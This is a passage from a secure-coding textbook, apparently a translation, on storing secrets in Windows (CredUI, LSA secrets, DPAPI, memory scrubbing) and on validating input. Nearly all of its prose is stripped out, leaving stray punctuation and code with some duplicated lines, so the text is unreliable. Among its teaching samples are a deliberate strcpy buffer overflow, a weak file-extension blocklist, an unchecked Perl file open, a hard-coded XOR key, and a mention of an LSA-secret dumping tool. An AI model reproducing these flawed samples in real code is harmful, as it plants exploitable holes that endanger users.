SQL.
(. Secureco2\Chapter09\Cred) , 
.

/*
Cred.cpp
*/
#include <stdio.h>
#include <windows.h>
#include <wincred.h>
CREDUI_INFO cui;
cui.cbSize = sizeof CREDUI_INFO;
cui.hwndParent = NULL;
cui.pszMessageText =
TEXT(",
Northwind Traders Accounts.");
cui.pszCaptionText = TEXT("Northwind Traders Accounts") ;
cui.hbmBanner = NULL;
PCTSTR pszTargetName = TEXT("NorthwindAccountsServer");
DWORD dwErrReason = 0;
Char pszName[CREDUI_MAX_USERNAME_LENGTH+1];
Char pszPwd[CREDUI_MAX_PASSWORD_LENGTH+1];
DWORD dwName = CREDUI_MAX_USERNAME_LENGTH;
DWORD dwPwd = CREDUI_MAX_PASSWORD_LENGTH;
BOOL fSave = FALSE;
DWORD dwFlags =
CREDUI_FLAGS_GENERIC_CREDENTIALS |
CREDUI_FLAGS_ALWAYS_SHOW_UI;
// .
ZeroMemory(pszName, dwName);
ZeroMemory(pszPwd, dwPwd);
DWORD err = CredUIPromptForCredentials(
&cui,
pszTargetName,
NULL,
dwErrReason,
pszName,dwName,
pszPwd,dwPwd,
&fSave,
dwFlags);
if (err)
printf(" CredUIPromptForCredentials() !> %d",
GetLastError());

267

else {
// Northwind Traders Accounting
// pszName pszPwd .
}
, . 91. :
,
( NorthwindAccountsServer) DPAPI.

. 91. Credential Manager



CredUICmdLinePromptForCre
dentials, .
,
, ,
Platform SDK, .
! : ,
, , , 
.

Windows NT 4
Windows NT 4 DPAPI, CryptoAPI ACL. 
.
1. CryptGenRandom .
2. .
3. ACL Creator/Owner Admi
nistrators.
4. , 
ACE (SACL), .

. ,

268

II

. ,
, .
, LSA (
LsaStorePrivateData LsaRetrievePrivateData). LSA 
: , , . 
( ), 
. .
LSA L$. LSA, 
,
. LSA G$.
LSA 
, M$. (private) LSA,
, .
,
. ,
SC_. ,
, LsaStorePrivateData
MSDN.

LSA DPAPI
, :
LSA 4096 , DPAPI 
;
LSA ,
DPAPI ;
DPAPI , LSA
;
LSA , DPAPI

, , ;
LSA,
. DPAPI 
, ACL,
.
LSA,
LSA. C++,
:

// LSASecrets.cpp : .
#include <windows.h>
#include <stdio.h>
#include "ntsecapi.h"
bool InitUnicodeString(LSA_UNICODE_STRING* pUs, const WCHAR* input){
DWORD len = 0;
if(!pUs)

269

return false;
if(input){
len = wcslen(input);
if(len > 0x7ffe) // 32k, FALSE;
}
pUs!>Buffer = (WCHAR*)input;
pUs!>Length = (USHORT)len * sizeof(WCHAR);
pUs!>MaximumLength = (USHORT)(len + 1) * sizeof(WCHAR);
return true;
}
LSA_HANDLE GetLSAPolicyHandle(WCHAR *wszSystemName) {
LSA_OBJECT_ATTRIBUTES ObjectAttributes;
ZeroMemory(&ObjectAttributes, sizeof(ObjectAttributes));
LSA_UNICODE_STRING lusSystemName;
if(!InitUnicodeString(&lusSystemName, wszSystemName))return NULL;
LSA_HANDLE hLSAPolicy = NULL;
NTSTATUS ntsResult = LsaOpenPolicy(&lusSystemName,&ObjectAttributes,
POLICY_ALL_ACCESS,
&hLSAPolicy);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS) {
wprintf(L"OpenPolicy returned %lu\n",dwStatus);
return NULL;
}
return hLSAPolicy;
}
(. Secureco2\Chapter09\LSASecrets) ,
LSA :

DWORD WriteLsaSecret(LSA_HANDLE hLSA,


WCHAR *wszSecret, WCHAR *wszName)
{
LSA_UNICODE_STRING lucName;
if(!InitUnicodeString(&lucName, wszName))
return ERROR_INVALID_PARAMETER;
LSA_UNICODE_STRING lucSecret;
if(!InitUnicodeString(&lucSecret, wszSecret))
return ERROR_INVALID_PARAMETER;
NTSTATUS ntsResult = LsaStorePrivateData(hLSA,&lucName, &lucSecret);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS)
wprintf(L" %lu\n",dwStatus);
return dwStatus;
}
DWORD ReadLsaSecret(LSA_HANDLE hLSA,DWORD dwBuffLen,
WCHAR *wszSecret, WCHAR *wszName)

270

II

{
LSA_UNICODE_STRING lucName;
if(!InitUnicodeString(&lucName, wszName))
return ERROR_INVALID_PARAMETER;
PLSA_UNICODE_STRING plucSecret = NULL;
NTSTATUS ntsResult = LsaRetrievePrivateData(hLSA,
&lucName, &plucSecret);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS)
wprintf(L" %lu\n",dwStatus);
else
wcsncpy(wszSecret, plucSecret!>Buffer,
min((plucSecret!>Length)/sizeof WCHAR,dwBuffLen));
if (plucSecret)
LsaFreeMemory(plucSecret);
return dwStatus;
}
int main(int argc, char* argv[]) {
LSA_HANDLE hLSA = GetLSAPolicyHandle(NULL);
WCHAR *wszName = L"L$WritingSecureCode";
WCHAR *wszSecret = L"My Secret Data!";
if (WriteLsaSecret(hLSA, wszSecret, wszName) == ERROR_SUCCESS) {
WCHAR wszSecretRead[128];
if (ReadLsaSecret(hLSA,sizeof wszSecretRead / sizeof WCHAR,
wszSecretRead,wszName) == ERROR_SUCCESS)
wprintf(L" LSA '%s' '%s'\n",wszName,wszSecretRead);
}
if (hLSA) LsaClose(hLSA);
return 0;
}
LSA, LsaStorePrivateData NULL.
, LSA, 
, LSADUMP2.exe, 
BindView (http://razor.bindview.com/tools/desc/lsadump2_
readme.html). ,
!

Windows 95/98/Me
Windows CE
Windows 95/98/Me Windows CE ( 
) CryptoAPI, ACL. 
, ,
, ? ? 

271

ACL? .
. 
, , Windows NT 4 Windows 2000/XP.
, ( )
Windows 95/98/Me Windows CE ,
.
Crypt
GenRandom, , 
, , , ,
.. ,
. 
, ,
, .
, 
. : 
.
, ,
.
HKEY_LOCAL_MACHINE\HARDWARE Windows 95/98/Me
 , .
,  , . , 

.

PnP
Plug and Play Windows 98, Windows 2000

. ,
, 
. , :
,
SHA1,
. Web
http://msdn.microsoft.com/library/enus/devio/deviceman_7u9f.asp.

#include "windows.h"
#include "wincrypt.h"
#include "initguid.h"
#include "Setupapi.h"
#include "winioctl.h"
#include "strsafe.h"
// (DDK),
// !
DEFINE_GUID( GUID_DEVCLASS_CDROM,
\
0x4d36e965L, 0xe325, 0x11ce, 0xbf, 0xc1,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18 );
DEFINE_GUID( GUID_DEVCLASS_NET, \
0x4d36e972L, 0xe325, 0x11ce, 0xbf, 0xc1,

272

II

0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18


DEFINE_GUID( GUID_DEVCLASS_DISPLAY, \
0x4d36e968L, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_KEYBOARD,\
0x4d36e96bL, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_MOUSE,
\
0x4d36e96fL, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_SOUND,
\
0x4d36e97cL, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_USB, \
0x36fc9e60L, 0xc465, 0x11cf, 0x80,
0x44, 0x45, 0x53, 0x54, 0x00, 0x00
DEFINE_GUID( GUID_DEVCLASS_DISKDRIVE, \
0x4d36e967L, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_PORTS,
\
0x4d36e978L, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_PROCESSOR, \
0x50127dc3L, 0x0f36, 0x415e, 0xa6,
0x4c, 0xb3, 0xbe, 0x91, 0x0B, 0x65

);
0xc1,
);
0xc1,
);
0xc1,
);
0xc1,
);
0x56,
);
0xc1,
);
0xc1,
);
0xcc,
);

DWORD GetPnPStuff(LPGUID pGuid, LPTSTR szData, DWORD cData) {


HDEVINFO hDevInfo = SetupDiGetClassDevs(NULL,
NULL,
NULL,
DIGCF_PRESENT | DIGCF_ALLCLASSES);
if (INVALID_HANDLE_VALUE == hDevInfo)
return GetLastError();
// .
SP_DEVINFO_DATA did;
did.cbSize = sizeof(SP_DEVINFO_DATA);
for (int i = 0;
SetupDiEnumDeviceInfo(hDevInfo,i,&did);
i++) {
// .
if (*pGuid != did.ClassGuid)
continue;
const DWORD cBuff = 256;
char Buff[cBuff];
DWORD dwRegType = 0, cNeeded = 0;

if (SetupDiGetDeviceRegistryProperty(hDevInfo,
&did,
SPDRP_HARDWAREID,
&dwRegType,
(PBYTE)Buff,
cBuff,
&cNeeded))
// , .
if (cData > cNeeded) {
StringCchCat(szData,cData,"\n\t");
StringCchCat(szData,cData,Buff);
}
}
return 0;
}
DWORD CreateHashFromPnPStuff(HCRYPTHASH hHash) {
struct {
LPGUID guid;
_TCHAR *szDevice;
} device [] =
{
{(LPGUID)&GUID_DEVCLASS_CDROM, "CD"},
{(LPGUID)&GUID_DEVCLASS_DISPLAY, "VDU"},
{(LPGUID)&GUID_DEVCLASS_NET, "NET"},
{(LPGUID)&GUID_DEVCLASS_KEYBOARD, "KBD"},
{(LPGUID)&GUID_DEVCLASS_MOUSE, "MOU"},
{(LPGUID)&GUID_DEVCLASS_USB, "USB"},
{(LPGUID)&GUID_DEVCLASS_PROCESSOR,"CPU"}
};
const DWORD cData = 4096;
TCHAR *pData = new TCHAR[cData];
if (!pData)
return ERROR_NOT_ENOUGH_MEMORY;
DWORD dwErr = 0;
for (int i=0; i < sizeof(device)/sizeof(device[0]); i++) {
ZeroMemory(pData,cData);
if (GetPnPStuff(device[i].guid,pData,cData) == 0) {
#ifdef _DEBUG
printf("%s: %s\n",device[i].szDevice, pData);
#endif
if (!CryptHashData(hHash,
(LPBYTE)pData, lstrlen(pData), 0)) {
dwErr = GetLastError();

273

274

II

break;
}
} else {
dwErr = GetLastError();
}
}
delete [] pData;
return dwErr;
}
int _tmain(int argc, _TCHAR* argv[]) {
HCRYPTPROV hProv = NULL;
HCRYPTHASH hHash = NULL;
if (CryptAcquireContext
(&hProv,NULL,NULL,PROV_RSA_FULL,CRYPT_VERIFYCONTEXT)) {
if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash)) {
if (CreateHashFromPnPStuff(hHash) == 0) {
// .
BYTE hash[20];
DWORD cbHash = 20;
if (CryptGetHashParam
(hHash,HP_HASHVAL,hash,&cbHash,0)) {
for (DWORD i=0; i < cbHash; i++) {
printf("%02X",hash[i]);
}
}
}
}
}
if (hHash)
CryptDestroyHash(hHash);
if (hProv)
CryptReleaseContext(hProv, 0);
}
if (hHash)
CryptDestroyHash(hHash);
if (hProv)
CryptReleaseContext(hProv, 0);
}

275


. ,
, .
!
,
,
. :
.

,
,
.


, Windows 
. 
ACL,
. ,
Windows NT 4 , 
?
, Windows NT 4, Windows 2000
API .
, ,
, , 
,
. , Win
dows NT, Windows 2000 , Win
dows 2000 DPAPI, Windows NT 4 LSA.

// CryptProtectData.
typedef BOOL (WINAPI CALLBACK* CPD)
(DATA_BLOB*,LPCWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
// CryptUnprotectData.
typedef BOOL (WINAPI CALLBACK* CUD)
(DATA_BLOB*,LPWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
HRESULT EncryptData(LPCTSTR szPlaintext) {
HRESULT hr = S_OK;
HMODULE hMod = LoadLibrary(_T("crypt32.dll"));
if (!hMod)
return HRESULT_FROM_WIN32(GetLastError());
CPD cpd = (CPD)GetProcAddress(hMod,_T("CryptProtectData"));

276

II

if (cpd) {
// DPAPI cpd ;
// ,
// ACL.
} else {
// API! LSA.
}
FreeLibrary(hMod);
return hr;
}


:
;
;
;
.

,
. ,
. , , , 
, ,
. , 

.
, 
( ) memset ZeroMemory,
memset:

#define ZeroMemory RtlZeroMemory


#define RtlZeroMemory(Destination,Length)!
memset((Destination),0,(Length))
, ,
. ( , 
,
!) malloc,
_msize . Windows
, , HeapCreate
HeapAlloc, , HeapSize. 
.

void *p = malloc(N);
...
size_t cb = _msize(p);
memset(p,0,cb);

277

...
C C++ 
. , 
, ..

(dead code). , , 
, , 
, . :

void DatabaseConnect(char *szDB) {


char szPwd[64];
if (GetPasswordFromUser(szPwd,sizeof(szPwd))) {
if (ConnectToDatabase(szDB, szPwd)) {
// , .
// .
}
}
ZeroMemory(szPwd,sizeof(szPwd));
}
: ! , 
. ZeroMemory! 
, , szPwd
DatabaseConnect.
, ?
, 
Microsoft Visual C++ .NET. C 
Intel x86. C 
(;) ( 30).

; 30

: void DatabaseConnect(char *szDB) {


sub
mov
xor

; 31
; 32

:
:
push
mov
lea
push
call
add
test
je

; 33

esp, 68; 00000044H


eax, DWORD PTR ___security_cookie
eax, DWORD PTR __$ReturnAddr$[esp+64]
char szPwd[64];
if (GetPasswordFromUser(szPwd,sizeof(szPwd))) {
64; 00000040H
DWORD PTR __$ArrayPad$[esp+72], eax
eax, DWORD PTR _szPwd$[esp+72]
eax
GetPasswordFromUser
esp, 8
al, al
SHORT $L1344
if (ConnectToDatabase(szDB, szPwd)) {

278

II

mov
lea
push
push
call
add
$L1344:
;
;
;
;
;
;
;

34
35
36
37
38
39
40

edx, DWORD PTR _szDB$[esp+64]


ecx, DWORD PTR _szPwd$[esp+68]
ecx
edx
ConnectToDatabase
esp, 8

:
// , .
:
// .
:
}
:
}
:
:
ZeroMemory(szPwd,sizeof(szPwd));
: }

mov
ecx, DWORD PTR __$ArrayPad$[esp+68]
xor
ecx, DWORD PTR __$ReturnAddr$[esp+64]
add
esp, 68; 00000044H
jmp
@__security_check_cookie@4
DatabaseConnect ENDP
30  
/GS, cookie (stackbased
cookie). ( 5.) 3440
, 30 cookie
. ? 
_memset. ( , ZeroMemory , 
memset.)


, 
. , 
if  , 
.
,
. , 
, (
)
. , 
, 
(control flow graph), 
. , 
.
(dead store elimination).
, , 
(AS IF rule), .

279

, , ,
. 
,
, 
.
, . 
Visual C++ ,
, .
, ,
, , , szPwd
, .
Microsoft Visual C++ 6 7, GNU C (GCC) 3.x.
, 
. Windows Security Push (. 2) 
(inline) ZeroMemory SecureZeroMemory, 
. ( 
winbase.h):

#ifndef FORCEINLINE
#if (MSC_VER >= 1200)
#define FORCEINLINE __forceinline
#else
#define FORCEINLINE __inline
#endif
#endif
...
FORCEINLINE PVOID SecureZeroMemory(
void *ptr, size_t cnt) {
volatile char *vptr = (volatile char *)ptr;
while (cnt) {
*vptr = 0;
vptr++;
cnt!!;
}
return ptr;
}
, 
Windows. : 
ZeroMemory memset
.
,
!
memset 
. ,
, . ,

280

II

volatile, 
.
, ZeroMemory :

*(volatile char*)szPwd = *(volatile char *)szPwd;


, 
C/C++ , 
volatile, .
,
, ,
volatile.
, ,
.
#pragma:

#pragma optimize("",off)
// .
#pragma optimize("",on)
. 
Og ( Ox,
O1 O2) Visual C++ . 

, #pragma.



, , ,
.  
. 
CryptoAPI.
.
Windows .NET Server 2003 API, CryptProtect
Memory CryptUnprotectMemory; DPAPI, 
. 
, 
, . ,
. .

#include <wincrypt.h>
#define SECRET_LEN 15 // null.
HRESULT hr = S_OK;
LPWSTR pSensitiveText = NULL;
DWORD cbSensitiveText = 0;
DWORD cbPlainText = SECRET_LEN * sizeof(WCHAR);
DWORD dwMod = 0;

281

//
// CYPTPROTECTMEMORY_BLOCK_SIZE.
if (dwMod = cbPlainText % CRYPTPROTECTMEMORY_BLOCK_SIZE)
cbSensitiveText = cbPlainText + (CRYPTPROTECTMEMORY_BLOCK_SIZE ! dwMod);
else
cbSensitiveText = cbPlainText;
pSensitiveText = (LPWSTR)LocalAlloc(LPTR, cbSensitiveText);
if (NULL == pSensitiveText)
return E_OUTOFMEMORY;
// pSensitiveText,
// .
if (!CryptProtectMemory(pSensitiveText,
cbSensitiveText,
CRYPTPROTECTMEMORY_SAME_PROCESS)) {
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
return GetLastError();
}
// CryptUnprotectMemory .
...
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
return hr;

Platform SDK.



, 
. 
, .
( , AllocateUserPhysicalPages VirtualLock) 
.
, 
, (hibernate
mode) , , 

.

282

II

VirtualLock
API VirtualLock Windows NT 4 

.
. 
( , , 
, ), 

.
, .

.

,
. 
, , ! , ,
, , 
.
,
.

.
( , 
). , :

, 
;

,
, ,
. :
, , , 
, .


(common language runtime, CLR) .NET .NET
Framework 
, XML
! .NET
XCOPY,
. DLL 
, 
! , 
, 

283

, . 

.
, . ,
XCOPY , ,
, .
, , 
.

public static char[] EncryptAndDecrypt(string data) {


// !!!! .
string key = "yeKterceS";
char[] text = data.ToCharArray();
for (int i = 0; i < text.Length; i++)
text[i] ^= key[i % key.Length];
return text;
}

, LSA DPAPI.
, C#
DPAPI. NativeMethods.cs, 
, 
(PInvoke), DPAPI.
Secureco2\Chapter09\DataProtection. System.Run
time.InteropServices COM API
.NET.

// DataProtection.cs
namespace Microsoft.Samples.DPAPI {
using System;
using System.Runtime.InteropServices;
using System.Text;
public class DataProtection {
// ,
// Base!64.
public static string ProtectData(string data,
string name,
int flags) {
byte[] dataIn = Encoding.Unicode.GetBytes(data);
byte[] dataOut = ProtectData(dataIn, name, flags);
return (null != dataOut)
? Convert.ToBase64String(dataOut)
: null;
}
// Base!64

284

II

// .
public static string UnprotectData(string data) {
byte[] dataIn = Convert.FromBase64String(data);
byte[] dataOut = UnprotectData(dataIn,
NativeMethods.UIForbidden |
NativeMethods.VerifyProtection);
return (null != dataOut)
? Encoding.Unicode.GetString(dataOut)
: null;
}
////////////////////////
// //
////////////////////////
internal static byte[] ProtectData(byte[] data,
string name,
int dwFlags) {
byte[] cipherText = null;
// .
NativeMethods.DATA_BLOB din =
new NativeMethods.DATA_BLOB();
din.cbData = data.Length;
din.pbData = Marshal.AllocHGlobal(din.cbData);
Marshal.Copy(data, 0, din.pbData, din.cbData);
NativeMethods.DATA_BLOB dout =
new NativeMethods.DATA_BLOB();
NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();
// DPAPI.
InitPromptstruct(ref ps);
try {
bool ret =
NativeMethods.CryptProtectData(
ref din,
name,
NativeMethods.NullPtr,
NativeMethods.NullPtr,
ref ps,
dwFlags, ref dout);
if (ret) {
cipherText = new byte[dout.cbData];
Marshal.Copy(dout.pbData,
cipherText, 0, dout.cbData);

NativeMethods.LocalFree(dout.pbData);
} else {
#if (DEBUG)
Console.WriteLine(" : " +
Marshal.GetLastWin32Error().ToString());
#endif
}
}
finally {
if ( din.pbData != IntPtr.Zero )
Marshal.FreeHGlobal(din.pbData);
}
return cipherText;
}
internal static byte[] UnprotectData(byte[] data,
int dwFlags) {
byte[] clearText = null;
// .
NativeMethods.DATA_BLOB din =
new NativeMethods.DATA_BLOB();
din.cbData = data.Length;
din.pbData = Marshal.AllocHGlobal(din.cbData);
Marshal.Copy(data, 0, din.pbData, din.cbData);
NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();
InitPromptstruct(ref ps);
NativeMethods.DATA_BLOB dout =
new NativeMethods.DATA_BLOB();
try {
bool ret =
NativeMethods.CryptUnprotectData(
ref din,
null,
NativeMethods.NullPtr,
NativeMethods.NullPtr,
ref ps,
dwFlags,
ref dout);
if (ret) {
clearText = new byte[ dout.cbData ] ;
Marshal.Copy(dout.pbData,
clearText, 0, dout.cbData);
NativeMethods.LocalFree(dout.pbData);

285

286

II

} else {
#if (DEBUG)
Console.WriteLine(" : " +
Marshal.GetLastWin32Error().ToString());
#endif
}
}
finally {
if ( din.pbData != IntPtr.Zero )
Marshal.FreeHGlobal(din.pbData);
}
return clearText;
}
static internal void InitPromptstruct(
ref NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps) {
ps.cbSize = Marshal.SizeOf(
typeof(NativeMethods.CRYPTPROTECT_PROMPTSTRUCT));
ps.dwPromptFlags = 0;
ps.hwndApp = NativeMethods.NullPtr;
ps.szPrompt = null;
}
}
}
C# , DataPro
tection:

using Microsoft.Samples.DPAPI;
using System;
using System.Text;
class TestStub {
public static void Main(string[] args) {
string data = ", .";
string name="MySecret";
Console.WriteLine(" : " + data);
string s = DataProtection.ProtectData(data,
name,
NativeMethods.UIForbidden);
if (null == s) {
Console.WriteLine(" ");
return;
}
Console.WriteLine(" : " + s);
s = DataProtection.UnprotectData(s);
Console.WriteLine(" : " + s);
}
}

287

COM+;
, COM+.

. 
System.EnterpriseServices.
. 
COM+ C# 
. .
: + 
SN.exe, c:\keys\DemoSrv.snk,
. (strong
named assemblies) 18.

using
using
using
using

System;
System.Reflection;
System.Security.Principal;
System.EnterpriseServices;

[assembly:
[assembly:
[assembly:
[assembly:

ApplicationName("ConstructDemo")]
ApplicationActivation(ActivationOption.Library)]
ApplicationAccessControl]
AssemblyKeyFile(@"c:\keys\DemoSrv.snk")]

namespace DemoSrv {
[ComponentAccessControl]
[SecurityRole("DemoRole", SetEveryoneAccess = true)]
// .
[ConstructionEnabled(Default="Set new data.")]
public class DemoComp : ServicedComponent {
private string _construct;
override protected void Construct(string s) {
_construct = s;
}
public string GetConstructString() {
return _construct;
}
}
}
Microsoft ASP.NET ,
:

Function SomeFunc() As String


' ServicedComponent
' , .
Dim obj As DemoComp = New DemoComp
SomeFunc = obj.GetConstructString()
End Sub

288

II

Component
Services ( ) (. 92). Sys
tem.EnterpriseServices Web http://msdn.microsoft.com/
msdnmag/issues/01/10/complus/complus.asp.

. 92.

COM+



: ,
. :
.NET .
.
, . C#, ErasableData,
.
, 
. 
.

class ErasableData : IDisposable {


private byte[] _rbSecret;
private GCHandle _ph;
public ErasableData(int size) {
_rbSecret = new byte [size];
}
public void Dispose() {
Array.Clear(_rbSecret, 0, _rbSecret.Length);
_ph.Free();
}
// .
public byte[] Data {

set {
// .
_ph = GCHandle.Alloc(_rbSecret, GCHandleType.Pinned);
// .
byte[] Data = value;
Array.Copy (Data, _rbSecret, Data.Length);
}
get {
return _rbSecret;
}
}
}
class DriverClass {
static void Main(string[] args) {
if (args.Length == 0) {
// !
return;
}
// .
byte [] plaintext =
new UTF8Encoding().GetBytes(args[0]);
// .
using (ErasableData key = new ErasableData(16)) {
key.Data = GetSecretFromUser();
Rijndael aes = Rijndael.Create();
aes.Key = key.Data;
MemoryStream cipherTextStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream(
cipherTextStream,
aes.CreateEncryptor(),
CryptoStreamMode.Write);
cryptoStream.Write(plaintext, 0, plaintext.Length);
cryptoStream.FlushFinalBlock();
cryptoStream.Close();
// (IV).
byte [] ciphertext = cipherTextStream.ToArray();
byte [] IV = aes.IV;
// , .
aes.Clear();
cryptoStream.Clear();
}
}
}

289

290

II

: 
IDisposable. using C#
, , Dispose.
aes.Clear cryptoStream.Clear. Clear
.
Password,
C#.



, (
) ( ) 
. Secret.txt. ,
.

FAT-
(
XML)
Web.
: , 
.

XOR
,
XOR. , 
, ,
. ,
, Microsoft Word GIF.
,
XOR .

3DES
, , 
3DES (TripleDES).
: ,
.

3DES

, 
, . 
, . 
, , , , ,
, .

291

3DES

, 
, .
, . , ,
.

3DES ,
,
ACL
ACL ( 
), 
, . ,
, 
. , , 
, ( )
. , ! 
? .

3DES,
, ,
ACL
. 
,
, . ,
. ,
, . 

, .
 , 
. ,
, 
nCipher (http://www.ncipher.com).


,
. :
;
, ;
.
, , 
.
, .

292

II


. :
 ! . 91 
; .

9-1. ,


( ,
)

, :
!

COM+

LSA

DPAPI ( )

DPAPI ( )

. ,

. 
,
, 
, .
, .
.

10

!

 ,
? , . 
?
,  ,

. : 
, .
. : 
, . 
. .
:
.
, , 
, 
. , .
? 
, ,
, ,
. ,
, , 
, ? 
: ,
? ,
.

294

II

 
: ,
Web. ,
,
. , ,
, 
, , 
, 
/. ,
, ,
. , 
, . 
.
.
!

, !

, 
, .
, ,
, ,
Web, .

.
, 
, 
, 
. !


:
,

. 
 ,
,
. ,
. ,
, , .
. ?
?  (cross
site scripting) 13.

10

295


,
:
? ?
. :
( !);

;

.
. ?

void CopyData(char *szData) {


char cDest[32];
strcpy(cDest,szData);
// cDest.
...
}
, , , !
, CopyData szData: 
. , :

char *szNames[] = {"Michael","Cheryl","Blake"};


CopyData(szNames[1]);

32 . , strcpy . 
, , szData,
, ACL, strcpy
, null.
32 , cDest , ,
(. 101).

strcpy(cDest, szData);
strcpy

. 101.

,
szData cDect

, strcpy

, , ,
, . strcpy
, , 
, ! 
, 

296

II

ACL , . ,

, .
, ,
. , 
:  
, , 
.
:

void CopyData(char *szData, DWORD cbData) {


const DWORD cbDest = 32;
char cDest[cbDest];
if (szData != NULL && cbDest > cbData)
strncpy(cDest,szData,min(cbDest,cbData));
// cDest.
...
}
(strncpy), szData cbData 
, ,
cDest. , ,
,
. ,

. .
, ACL .
, , , ACL
Everyone (). 
? !
, c:\boot.ini. , ACL 

Everyone; 
, .
ACL : 
, , ,
.

,



. :
;
 (chokepoint) .

10

297

, ,
, . 
,
, , . 
, ,
. 

, .
, .
; , 

 (). , 
, (Web,
, , ..),
, , 
.
! , DLL,
ActiveX , 
. 
, .
, , 
.
, (. 102).

. 102.

298

II

,
, 
. 
.
Web ,
 (crosssite scripting): ( HTML 
) Web.
13. Web
, 
. 2001 .
Web, . 
Web : ,
( ), , 
. .
, ,
Web , ! 
. 
.


, 
: , . 
3 
,
. ,
. :
;
.
11: 
,
. 
.
. 
. ,
. 
, . 
.

bool IsBadExtension(char *szFilename) {


bool fIsBad = false;
if (szFilename) {
size_t cFilename = strlen(szFilename);
if (cFilename >= 3) {
char *szBadExt[]
= {".exe", ".com", ".bat", ".cmd"};

10

299

char *szLCase
= _strlwr(_strdup(szFilename));
for (int i=0;
i < sizeof(szBadExt) / sizeof(szBadExt[0]);
i++)
if (szLCase[cFilename!1] == szBadExt[i][3] &&
szLCase[cFilename!2] == szBadExt[i][2] &&
szLCase[cFilename!3] == szBadExt[i][1] &&
szLCase[cFilename!4] == szBadExt[i][0])
fIsBad = true;
}
}
return fIsBad;
}
bool CheckFileExtension(char *szFilename) {
if (!IsBadExtension(szFilename))
if (UploadUserFile(szFilename))
NotifyUserUploadOK(szFilename);
}
? IsBadExtension
.
: , , . 
, Perl (.pl)
, Windows Scripting Host (.wsh, .js .vbs),
.
, Microsoft Office
(.doc, .xls ..),
. . 

. 
Web,

. :

bool IsOKExtension(char *szFilename) {


bool fIsOK = false;
if (szFilename) {
size_t cFilename = strlen(szFilename);
if (cFilename >= 3) {
char *szOKExt[] =
{".txt", ".rtf", ".gif", ".jpg", ".bmp"};
char *szLCase =
_strlwr(_strdup(szFilename));
for (int i=0;

300

II

i < sizeof(szOKExt) / sizeof(szOKExt[0]);


i++)
if (szLCase[cFilename!1] == szOKExt[i][3] &&
szLCase[cFilename!2] == szOKExt[i][2] &&
szLCase[cFilename!3] == szOKExt[i][1] &&
szLCase[cFilename!4] == szOKExt[i][0])
fIsOK = true;
}
}
return fIsOK;
}
, :
(.txt), Rich Text Format (.rtf).
 ! , ,  
, , ,
, .

Perl
Perl : 
(tainted), , 
. 
(, ) Perl .
:

use strict;
my $filename = <STDIN>;
open (FILENAME, ">> " . $filename) or die $!;
print FILENAME "Hello!";
close FILENAME;
, , 
. \boot.ini.

(T) Perl , 
open:

Insecure dependency in open while running with !T switch at testtaint.pl line 3,


<STDIN> line 1
open . 
: .

use strict;
my $filename = <STDIN>;
$filename =~ /(\w{1,8}\.log)/;
open (FILENAME, ">> " . $1) or die $!;
print FILENAME "Hello!";
close FILENAME;

10

301

.
8 .log. 
( 
), $1,
open. Perl , 
(, /(.*)/ ), 
.
, .




.
, . C#
, C++.
RegularExpressions .NET Framework.

using System.Text.RegularExpressions;
...
static bool IsOKExtension(string Filename) {
Regex r =
new Regex(@"txt|rtf|gif|jpg|bmp$",
RegexOptions.IgnoreCase);
return r.Match(Filename).Success;
}
Perl :

sub isOkExtension($) {
$_ = shift;
return /txt|rtf|gif|jpg|bmp$/i ? !1 : 0;
}
, ,
. txt|rtf|gif|jpg|bmp$.
. 101.

10-1.

xxx|yyy

xxx yyy

, 
, true. , 
C# RegexOptions.IgnoreCase, Microsoft Windows
.
. 102 
. , 
.

302

II

10-2.

.
, {0,}

.
, {1,}

.
, {0,1}

{n}

{n,}

{,m}

{n,m}

n, m

\n

(<>)

() .

.
, (xx)+ ,
, . , 
(?:xx),

aa|bb

aa bb

[abc]

: a, b c

[^abc]

[az]

.
a z

. 
(\n \/), 
(\d). 
() (\1)

\b

\B

\d

. , [09]

\D

. , [^09]

\n, \r, \f, \t, \v

: , ,
,

\p{<>} Unicode; 

\s

; , [\f\n\r\t\v]

\S

, ; , [^\f\n\r\t\v]

\w

() ; , [azAZ09_]

\W

( ) ;
, [^azAZ09_]

\xnn \x{nn}

, , nn

\unnnn
\x{nnnn}

Unicode, 
, nnnn. ,  

( 14)

10

303

(. 103).

10-3.

[afAF09]+

<(.*)>.*<\/\1>

HTML. : (.*) 
(\1). , (.*)
FORM, \1 FORM

\d{5}(\d{4})?

^\w{1,32}(?:\.\w{0,4})? $

, . 1 32
,
0 4 .
, 
, ?:
: ^ $
.

( )
. ,
( ) . 
, , ,
, , .
. , 
:

